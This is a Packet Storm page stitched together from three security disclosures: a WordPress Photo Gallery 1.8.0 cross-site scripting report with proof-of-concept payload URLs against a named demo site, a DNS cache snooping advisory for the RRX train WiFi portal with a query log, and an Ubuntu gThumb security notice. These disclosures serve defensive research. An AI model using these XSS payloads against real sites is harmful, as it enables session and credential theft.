││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘URL parameter 'pg' is vulnerable to XSSPath: /photo-gallery/https://wpsofts.com/grid-kit-demo/photo-gallery/?pid=47&pg=2&zdifv%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eh18n1=1URL parameter 'pid' is vulnerable to XSSPath: /photo-gallery/https://wpsofts.com/grid-kit-demo/photo-gallery/?pida2sg4%27%2dalert%281%29%2d%27z632u&pg=2[-] Done

WordPress Photo Gallery 1.8.0 Cross Site Scripting

RRX IOB LP version 1.0 suffers from a DNS cache snooping vulnerability.

    Document Title:===============RRX IOB LP v1.0 - DNS Cache Snooping VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2261Article:https://www.vulnerability-db.com/?q=articles/2022/10/11/rhein-ruhr-express-rrx-dns-cache-snooping-vulnerability-wifi-hotspotRelease Date:=============2022-10-11Vulnerability Laboratory ID (VL-ID):====================================2261Common Vulnerability Scoring System:====================================5.3Vulnerability Class:====================MultipleCurrent Estimated Price:========================2.000€ - 3.000€Product & Service Introduction:===============================This product, solution or service ("Product") contains third-party software components listed in this document. These components are Open SourceSoftware licensed under a license approved by the Open Source Initiative (www.opensource.org) or similar licenses as determined by SIEMENS ("OSS")and/or commercial or freeware software components. With respect to the OSS components, the applicable OSS license conditions prevail over any otherterms and conditions covering the Product. The OSS portions of this Product are provided royalty-free and can be used at no charge.If SIEMENS has combined or linked certain components of the Product with/to OSS components licensed under the GNU LGPL version 2 or later as per thedefinition of the applicable license, and if use of the corresponding object file is not unrestricted ("LGPL Licensed Module", whereas the LGPLLicensed Module and the components that the LGPL Licensed Module is combined with or linked to is the "Combined Product"), the following additionalrights apply, if the relevant LGPL license criteria are met: (i) you are entitled to modify the Combined Product for your own use, including but notlimited to the right to modify the Combined Product to relink modified versions of the LGPL Licensed Module, and (ii) you may reverse-engineer theCombined Product, but only to debug your modifications. The modification right does not include the right to distribute such modifications and youshall maintain in confidence any information resulting from such reverse-engineering of a Combined Product.Certain OSS licenses require SIEMENS to make source code available, for example, the GNU General Public License, the GNU Lesser General Public Licenseand the Mozilla Public License. If such licenses are applicable and this Product is not shipped with the required source code, a copy of this sourcecode can be obtained by anyone in receipt of this information during the period required by the applicable OSS licenses by contacting the following address.Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a dns snooping vulnerability in the Rhein Ruhr Express (RRX IOB Landing Page 1.0 - Open Source Software) with Hotspot Siemens Portal.Vulnerability Disclosure Timeline:==================================2020-08-03: Researcher Notification & Coordination (Security Researcher)2020-08-04: Vendor Notification (Security Department)2020-08-27: Vendor Response/Feedback #1 (Security Department)2020-11-10: Vendor Response/Feedback #2 (Security Department)2021-01-30: Security Acknowledgements (Security Department)2022-10-09: Vendor Fix/Patch by Check (Service Developer Team)2022-10-11: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (Guest Privileges)User Interaction:=================No User InteractionDisclosure Type:================Responsible DisclosureTechnical Details & Description:================================A dns cache snooping vulnerability has been discovered in the official Rhein Ruhr Express (RRX IOB Landing Page 1.0 - Open Source Software) with Hotspot Siemens Portal.The vulnerability allows remote attackers to determine resolved sites and name servers to followup with manipulative interactions.The vulnerability allows remote attackers to determine which domains have recently been resolved via this name server, and therefore which hosts have been recently visited.For instance, if an attacker was interested in whether your company utilizes the online services of a particular financial institution, they would be able to use this attackto build a statistical model regarding company usage of that financial institution. Of course, the attack can also be usead to find B2B partners, web-surfing patterns, externalmail servers, and more. If this is an internal DNS server not accessible to outside networks, attacks would be limited to the internal network. This may include employees,consultants and potentially users on a guest network or WiFi connection if supported.Proof of Concept (PoC):=======================The dns cache snooping vulnerability can be exploited by remote attackers with wifi guest access without user interaction or privileged user account.For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.--- PoC Session Logs ---Sent a non-recursive query for test.comand received 1 answer: dnsmasq-2.7593.184.216.34Hosts53 / udp / dns   192.168.44.1Solution - Fix & Patch:=======================Improve the cache management via dns to ensure no manipulations can take place.Contact the manufacturer siemens to resolve the issue by an automated or manual patch.2022-10-09: Vendor Fix/Patch by Check (Service Developer Team)The patching process will be delivered by siemens during train maintenance and will take at least until 2022 Q2-Q3 to be rolled out on all trains (40+).Security Risk:==============The security risk of the web vulnerability in the siemens hotspot rxx wifi is estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.comServices:   magazine.vulnerability-lab.com  paste.vulnerability-db.com       infosec.vulnerability-db.comSocial:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab       youtube.com/user/vulnerability0labFeeds:      vulnerability-lab.com/rss/rss.php   vulnerability-lab.com/rss/rss_upcoming.php   vulnerability-lab.com/rss/rss_news.phpPrograms:   vulnerability-lab.com/submit.php   vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.phpAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

RRX IOB LP 1.0 DNS Cache Snooping

Ubuntu Security Notice 5680-1 - It was discovered that gThumb did not properly managed memory when processing certain image files. If a user were tricked into opening a specially crafted JPEG file, an attacker could possibly use this issue to cause gThumb to crash, resulting in a denial of service, or possibly execute arbitrary code. It was discovered that gThumb did not properly handled certain malformed image files. If a user were tricked into opening a specially crafted JPEG file, an attacker could possibly use this issue to cause gThumb to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5680-1October 14, 2022gThumb vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in gThumb.Software Description:- gthumb: image viewer and browserDetails:It was discovered that gThumb did not properly managedmemory when processing certain image files. If a user weretricked into opening a specially crafted JPEG file, anattacker could possibly use this issue to cause gThumb tocrash, resulting in a denial of service, or possiblyexecute arbitrary code. (CVE-2019-20326)It was discovered that gThumb did not properly handledcertain malformed image files. If a user were tricked intoopening a specially crafted JPEG file, an attacker couldpossibly use this issue to cause gThumb to crash, resultingin a denial of service. (CVE-2020-36427)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:gthumb 3:3.8.0-2.1ubuntu0.1gthumb-data 3:3.8.0-2.1ubuntu0.1In general, a standard system update will make all the necessary changes.References:https://ubuntu.com/security/notices/USN-5680-1CVE-2019-20326, CVE-2020-36427Package Information:https://launchpad.net/ubuntu/+source/gthumb/3:3.8.0-2.1ubuntu0.1

Source

Packet Storm